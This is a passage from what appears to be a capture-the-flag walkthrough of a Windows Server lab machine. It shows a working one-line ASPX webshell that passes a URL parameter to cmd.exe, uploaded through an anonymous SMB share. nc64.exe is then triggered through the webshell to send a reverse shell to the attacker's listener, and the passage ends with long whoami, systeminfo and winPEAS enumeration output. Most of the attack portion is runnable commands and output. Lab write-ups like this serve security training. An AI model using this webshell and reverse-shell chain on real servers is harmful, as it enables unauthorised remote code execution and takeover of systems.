CallbackShell(host, port);
}
1
2
smb: \> put shell.aspx shell.aspx
putting file shell.aspx as \shell.aspx (93.7 kB/s) (average 87.7 kB/s)
1
http://10.48.167.49:49663/nt4wrksv/shell.aspx
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.48.167.49: inverse host lookup failed: Unknown host
connect to [192.168.162.207] from (UNKNOWN) [10.48.167.49] 50004
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASps1/winPEAS.ps1
1
2
smb: \> put winPEAS.ps1 winPEAS.ps1
putting file winPEAS.ps1 as \winPEAS.ps1 (406.8 kB/s) (average 164.6 kB/s)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\inetpub\wwwroot\nt4wrksv>dir
dir
Volume in drive C has no label.
Volume Serial Number is AC3C-5CB5
Directory of C:\inetpub\wwwroot\nt4wrksv
10/08/2026 05:53 AM <DIR> .
10/08/2026 05:53 AM <DIR> ..
10/08/2026 05:19 AM 1,181 cmd-asp-5.1.asp
10/08/2026 05:14 AM 1,526 cmdasp.asp
07/25/2020 08:15 AM 98 passwords.txt
10/08/2026 05:35 AM 38,510 rev-shell.asp
10/08/2026 05:40 AM 15,551 shell.aspx
10/08/2026 05:26 AM 7,680 shell.exe
10/08/2026 05:53 AM 94,970 winPEAS.ps1
7 File(s) 159,516 bytes
2 Dir(s) 20,868,083,712 bytes free
Use this ASPX webshell
https://payloadplayground.com/cheatsheets/web-shells
webshell.aspx
<%@ Page Language="C#" %><% System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName="cmd.exe"; p.StartInfo.Arguments="/c "+Request["cmd"]; p.StartInfo.UseShellExecute=false; p.StartInfo.RedirectStandardOutput=true; p.Start(); Response.Write("<pre>"+p.StandardOutput.ReadToEnd()+"</pre>"); %>
1
2
3
4
5
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.49.169.27/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put webshell.aspx
putting file webshell.aspx as \webshell.aspx (2.4 kB/s) (average 2.4 kB/s)
1
2
3
http://10.49.169.27:49663/nt4wrksv/webshell.aspx?cmd=whoami
iis apppool\defaultapppool
Upload a nc.exe to target machine
https://github.com/int0x33/nc.exe/blob/master/nc64.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.49.169.27/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put nc64.exe
putting file nc64.exe as \nc64.exe (231.5 kB/s) (average 231.5 kB/s)
smb: \> ls
. D 0 Thu Oct 8 13:08:49 2026
.. D 0 Thu Oct 8 13:08:49 2026
nc64.exe A 45272 Thu Oct 8 13:08:49 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
webshell.aspx A 322 Thu Oct 8 12:49:22 2026
7735807 blocks of size 4096. 5100388 blocks available
1
C:\inetpub\wwwroot\nt4wrksv\nc64.exe 192.168.162.207 1234 -e cmd.exe
URL encode
1
C%3A%5Cinetpub%5Cwwwroot%5Cnt4wrksv%5Cnc64.exe%20192.168.162.207%201234%20-e%20cmd.exe
1
http://10.49.169.27:49663/nt4wrksv/webshell.aspx?cmd=C%3A\inetpub\wwwroot\nt4wrksv\nc64.exe%20192.168.162.207%201234%20-e%20cmd.exe
And we successfullt get a shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.49.169.27: inverse host lookup failed: Unknown host
connect to [192.168.162.207] from (UNKNOWN) [10.49.169.27] 50011
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: RELEVANT
OS Name: Microsoft Windows Server 2016 Standard Evaluation
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00378-00000-00000-AA739
Original Install Date: 7/25/2020, 7:56:59 AM
System Boot Time: 10/8/2026, 9:40:42 AM
System Manufacturer: Amazon EC2
System Model: t3a.micro
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2200 Mhz
BIOS Version: Amazon EC2 1.0, 10/16/2017
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,000 MB
Available Physical Memory: 398 MB
Virtual Memory: Max Size: 2,024 MB
Virtual Memory: Available: 1,033 MB
Virtual Memory: In Use: 991 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB3192137
[02]: KB3211320
[03]: KB3213986
Network Card(s): 1 NIC(s) Installed.
[01]: Amazon Elastic Network Adapter
Connection Name: Ethernet 3
DHCP Enabled: Yes
DHCP Server: 10.49.128.1
IP address(es)
[01]: 10.49.169.27
[02]: fe80::41d9:9c64:f059:1c17
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
c:\windows\system32\inetsrv>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Bob DefaultAccount
Guest
The command completed with one or more errors.
c:\windows\system32\inetsrv>hostname
hostname
Relevant
c:\windows\system32\inetsrv>net localgroup
net localgroup
Aliases for \\RELEVANT
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
The command completed successfully.
c:\windows\system32\inetsrv>
https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASps1/winPEAS.ps1
Upload winPEAS via SMB and execute
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //10.49.169.27/nt4wrksv -N
Try "help" to get a list of possible commands.
smb: \> put winPEAS.ps1
putting file winPEAS.ps1 as \winPEAS.ps1 (401.5 kB/s) (average 401.5 kB/s)
smb: \> ls
. D 0 Thu Oct 8 13:32:12 2026
.. D 0 Thu Oct 8 13:32:12 2026
nc64.exe A 45272 Thu Oct 8 13:08:49 2026
passwords.txt A 98 Sat Jul 25 11:15:33 2020
webshell.aspx A 322 Thu Oct 8 12:49:22 2026
winPEAS.ps1 A 94970 Thu Oct 8 13:32:12 2026
7735807 blocks of size 4096. 5100134 blocks available
1
C:\inetpub\wwwroot\nt4wrksv\winPEAS.ps1
1
powershell -File "C:\inetpub\wwwroot\nt4wrksv\winPEAS.ps1"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
c:\windows\system32\inetsrv>powershell -File "C:\inetpub\wwwroot\nt4wrksv\winPEAS.ps1"
powershell -File "C:\inetpub\wwwroot\nt4wrksv\winPEAS.ps1"
ADVISORY: WinPEAS - Windows local Privilege Escalation Awesome Script
WinPEAS should be used for authorized penetration testing and/or educational purposes only
Any misuse of this software will not be the responsibility of the author or of any other collaborator
Use it at your own networks and/or with the network owner's explicit permission
Indicates special privilege over an object or misconfiguration
Indicates protection is enabled or something is well configured
Indicates active users
Indicates disabled users
Indicates links
Indicates title
You can find a Windows local PE Checklist here: https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html
Best Linux PE & Hardening course: https://hacktricks-training.com/courses/lhe/
====================================||SYSTEM INFORMATION ||====================================
The following information is curated. To get a full list of system information, run the cmdlet get-computerinfo
Host Name: RELEVANT
OS Name: Microsoft Windows Server 2016 Standard Evaluation
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00378-00000-00000-AA739
Original Install Date: 7/25/2020, 7:56:59 AM
System Boot Time: 10/8/2026, 9:40:42 AM
System Manufacturer: Amazon EC2
System Model: t3a.micro
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2200 Mhz
BIOS Version: Amazon EC2 1.0, 10/16/2017
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,000 MB
Available Physical Memory: 303 MB
Virtual Memory: Max Size: 2,024 MB
Virtual Memory: Available: 948 MB
Virtual Memory: In Use: 1,076 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB3192137
[02]: KB3211320
[03]: KB3213986
Network Card(s): 1 NIC(s) Installed.
[01]: Amazon Elastic Network Adapter
Connection Name: Ethernet 3
DHCP Enabled: Yes
DHCP Server: 10.49.128.1
IP address(es)
[01]: 10.49.169.27
[02]: fe80::41d9:9c64:f059:1c17
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
=========|| WINDOWS HOTFIXES
=| Check missing patches with the embedded windows vulnerability definitions
HotfixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB3213986 Security Update 1/7/2017 12:00:00 AM
KB3211320 Update 1/7/2017 12:00:00 AM
KB3192137 Update 9/12/2016 12:00:00 AM
=========|| PRINTNIGHTMARE POINTANDPRINT POLICY
PointAndPrint policy key not found
=========|| ALL UPDATES INSTALLED
Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At C:\inetpub\wwwroot\nt4wrksv\winPEAS.ps1:864 char:1
+ $history = $session.QueryHistory("", 0, 1000) | Select-Object ResultC ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (:) [], UnauthorizedAccessExce
ption
+ FullyQualifiedErrorId : System.UnauthorizedAccessException
=========|| Drive Info
Drive: C:
Label:
Size: 29.51 GB
Free Space: 19.46 GB
=========|| Antivirus Detection (attemping to read exclusions as well)
ERROR:
Description = Invalid namespace
=========|| NET ACCOUNTS Info
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 0
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.
=========|| REGISTRY SETTINGS CHECK
=========|| Audit Log Settings
No Audit Log settings, no registry entry found.
=========|| Windows Event Forward (WEF) registry
Logs are not being fowarded, no registry entry found.
=========|| LAPS Check
LAPS dlls not found on this machine
=========|| WDigest Check
The system was unable to find the specified registry value: UseLogonCredential
=========|| LSA Protection Check
=========|| Credential Guard Check
=========|| Cached WinLogon Credentials Check
However, only the SYSTEM user can view the credentials here: HKEY_LOCAL_MACHINE\SECURITY\Cache
Or, using mimikatz lsadump::cache
=========|| Additonal Winlogon Credentials Check
=========|| RDCMan Settings Check
No RDCMan.Settings found.
=========|| RDP Saved Connections Check
HK_Users
Not found for HKEY_USERS\.DEFAULT
Not found for HKEY_USERS\S-1-5-18
HKCU
Terminal Server Client not found in HCKU
=========|| Putty Stored Credentials Check
No putty credentials found in HKCU:\SOFTWARE\SimonTatham\PuTTY\Sessions
=========|| SSH Key Checks
=========|| If found:
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
=========|| Checking Putty SSH KNOWN HOSTS
No putty ssh keys found
=========|| Checking for OpenSSH Keys
No OpenSSH Keys found.
=========|| Checking for WinVNC Passwords
No WinVNC found.
=========|| Checking for SNMP Passwords
SNMP Key found at HKLM:\SYSTEM\CurrentControlSet\Services\SNMP
=========|| Checking for TightVNC Passwords
No TightVNC found.
=========|| UAC Settings
EnableLUA is equal to 1. Part or all of the UAC components are on.
https://book.hacktricks.wiki/en/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#very-basic-uac-bypass-full-file-system-access
=========|| Recently Run Commands (WIN+R)
=========||HKCU Recently Run Commands
=========|| Always Install Elevated Check
Checking Windows Installer Registry (will populate if the key exists)
=========|| PowerShell Info
PowerShell 2.0 available
PowerShell 5.1.14393.0 available
=========|| PowerShell Registry Transcript Check
=========|| PowerShell Module Log Check
Hive: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Name Property
---- --------
Extensions
Paths
Processes
TemporaryPaths
The system was unable to find the specified registry value: RunAsPPL / RunAsPPLBoot
The system was unable to find the specified registry value: LsaCfgFlags
10
CurrentLocation :
Name : HKU
Provider : Microsoft.PowerShell.Core\Registry
Root : HKEY_USERS
Description :
MaximumSize :
Credential : System.Management.Automation.PSCredential
DisplayRoot :
Used :
Free :
=========|| PowerShell Script Block Log Check
=========|| WSUS check for http and UseWAServer = 1, if true, might be vulnerable to exploit
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell
Name Property
---- --------
ModuleLogging EnableModuleLogging : 1
ScriptBlockLogging EnableScriptBlockLogging : 1
EnableScriptBlockInvocationLogging : 1
=========|| Internet Settings HKCU / HKLM
User Agent - Mozilla/4.0 (compatible; MSIE 8.0; Win32)
IE5_UA_Backup_Flag - 5.0
ZonesSecurityUpgrade - 243 192 211 195 172 98 214 1
ActiveXCache - C:\Windows\Downloaded Program Files
CodeBaseSearchPath - CODEBASE
EnablePunycode - 1
MinorVersion - 0
WarnOnIntranet - 1
=========|| RUNNING PROCESSES
=========|| Checking user permissions on running processes
Identity Everyone has 'FullControl' perms for C:\inetpub\wwwroot\nt4wrksv\nc64.exe
=========|| System processes
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 0 4 K Unknown NT AUTHORITY\SYSTEM 1:41:24 N/A
=========|| SERVICE path vulnerable check
Checking for vulnerable service .exe
=========|| Checking for Unquoted Service Paths
Fetching the list of services, this may take a while...
Unquoted Service Path found!
Name: AWSLiteAgent
PathName: C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName: LocalSystem
StartMode: Auto
Running: Stopped
=========|| Checking Service Registry Permissions
This will take some time.
=========|| SCHEDULED TASKS vulnerable check
=========|| Testing access to c:\windows\system32\tasks
No admin access to scheduled tasks folder.
=========|| STARTUP APPLICATIONS Vulnerable Check
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#run-at-startup
Identity BUILTIN\Users BUILTIN\Users has 'Write' perms for C:\ProgramData
Identity BUILTIN\Users BUILTIN\Users has 'Write' perms for C:\ProgramData
=========|| STARTUP APPS Registry Check
=========|| INSTALLED APPLICATIONS
Generating list of installed applications
=========|| LOOKING FOR BASH.EXE
=========|| LOOKING FOR SCCM CLIENT
Not Installed.
=========|| NETWORK INFORMATION
=========|| HOSTS FILE
Get content of etc\hosts file
=========|| IP INFORMATION
=========|| Ipconfig ALL
Windows IP Configuration
Host Name . . . . . . . . . . . . : Relevant
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : ap-south-1.ec2-utilities.amazonaws.com
ap-south-1.compute.internal
Ethernet adapter Ethernet 3:
Connection-specific DNS Suffix . : ap-south-1.compute.internal
Description . . . . . . . . . . . : Amazon Elastic Network Adapter
Physical Address. . . . . . . . . : 0A-FF-C0-E6-3E-1B
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::41d9:9c64:f059:1c17%7(Preferred)
IPv4 Address. . . . . . . . . . . : 10.49.169.27(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.192.0
Lease Obtained. . . . . . . . . . : Thursday, October 8, 2026 9:41:31 AM
Lease Expires . . . . . . . . . . : Thursday, October 8, 2026 11:11:32 AM
Default Gateway . . . . . . . . . : 10.49.128.1
DHCP Server . . . . . . . . . . . : 10.49.128.1
DHCPv6 IAID . . . . . . . . . . . : 118161344
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-26-AE-44-DC-08-00-27-7C-35-30
DNS Servers . . . . . . . . . . . : 10.49.0.2
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter Local Area Connection* 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:0:14c9:d206:491:278b:f5ce:56e4(Preferred)
Link-local IPv6 Address . . . . . : fe80::491:278b:f5ce:56e4%3(Preferred)
Default Gateway . . . . . . . . . : ::
DHCPv6 IAID . . . . . . . . . . . : 134217728
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-26-AE-44-DC-08-00-27-7C-35-30
NetBIOS over Tcpip. . . . . . . . : Disabled
Tunnel adapter isatap.ap-south-1.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : ap-south-1.compute.internal
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
=========|| DNS Cache
Record Name . . . . . : ec2messages.ap-south-1.amazonaws.com
Record Type . . . . . : 1
A (Host) Record . . . : 10.49.155.163
Record Name . . . . . : ssm.ap-south-1.amazonaws.com
Record Type . . . . . : 1
A (Host) Record . . . : 10.49.169.26
=========|| LISTENING PORTS
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 708
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49663 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 424
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1416
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 844
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 556
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 572
TCP 10.49.169.27:139 0.0.0.0:0 LISTENING 4
TCP 10.49.169.27:445 192.168.162.207:54552 ESTABLISHED 4
TCP 10.49.169.27:49663 192.168.162.207:45238 ESTABLISHED 4
TCP 10.49.169.27:49746 10.49.158.97:443 ESTABLISHED 3668
TCP 10.49.169.27:49754 172.31.66.192:9092 ESTABLISHED 2796
TCP 10.49.169.27:49883 172.31.65.126:9092 ESTABLISHED 2796
TCP 10.49.169.27:50011 192.168.162.207:1234 ESTABLISHED 3236
TCP 10.49.169.27:50013 172.31.64.152:9092 ESTABLISHED 2796
TCP 10.49.169.27:50048 172.31.64.121:443 ESTABLISHED 2796
TCP 10.49.169.27:50051 10.49.169.26:443 TIME_WAIT 0
TCP 10.49.169.27:50055 10.49.169.26:443 ESTABLISHED 3668
TCP 10.49.169.27:50056 10.49.155.163:443 ESTABLISHED 3668
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 708
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 836
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49663 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 424
TCP [::]:49665 [::]:0 LISTENING 948
TCP [::]:49666 [::]:0 LISTENING 1416
TCP [::]:49667 [::]:0 LISTENING 844
TCP [::]:49668 [::]:0 LISTENING 556
TCP [::]:49669 [::]:0 LISTENING 572
UDP 0.0.0.0:123 *:* 300
UDP 0.0.0.0:3389 *:* 836
UDP 0.0.0.0:5050 *:* 300
UDP 0.0.0.0:5353 *:* 436
UDP 0.0.0.0:5355 *:* 436
UDP 10.49.169.27:137 *:* 4
UDP 10.49.169.27:138 *:* 4
UDP 10.49.169.27:1900 *:* 580
UDP 10.49.169.27:57028 *:* 580
UDP 127.0.0.1:1900 *:* 580
UDP 127.0.0.1:57029 *:* 580
UDP [::]:123 *:* 300
UDP [::]:3389 *:* 836
UDP [::]:5353 *:* 436
UDP [::]:5355 *:* 436
UDP [::1]:1900 *:* 580
UDP [::1]:57027 *:* 580
UDP [fe80::41d9:9c64:f059:1c17%7]:1900 *:* 580
UDP [fe80::41d9:9c64:f059:1c17%7]:57026 *:* 580
=========|| ACTIVE DIRECTORY / IDENTITY MISCONFIG CHECKS
Host appears to be in a workgroup or the AD context could not be resolved. Skipping domain-specific checks.
=========|| ARP Table
Interface: 10.49.169.27 --- 0x7
Internet Address Physical Address Type
10.49.128.1 0a-8d-9c-ee-ea-81 dynamic
10.49.155.163 0a-e9-70-68-34-d3 dynamic
10.49.158.97 0a-95-0d-e1-54-ad dynamic
10.49.169.26 0a-7b-39-25-dc-df dynamic
10.49.191.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
=========|| Routes
===========================================================================
Interface List
7...0a ff c0 e6 3e 1b ......Amazon Elastic Network Adapter
1...........................Software Loopback Interface 1
3...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
11...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.49.128.1 10.49.169.27 15
10.49.128.0 255.255.192.0 On-link 10.49.169.27 271
10.49.169.27 255.255.255.255 On-link 10.49.169.27 271
10.49.191.255 255.255.255.255 On-link 10.49.169.27 271
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
169.254.169.123 255.255.255.255 10.49.128.1 10.49.169.27 30
169.254.169.249 255.255.255.255 10.49.128.1 10.49.169.27 30
169.254.169.250 255.255.255.255 10.49.128.1 10.49.169.27 30
169.254.169.251 255.255.255.255 10.49.128.1 10.49.169.27 30
169.254.169.253 255.255.255.255 10.49.128.1 10.49.169.27 30
169.254.169.254 255.255.255.255 10.49.128.1 10.49.169.27 30
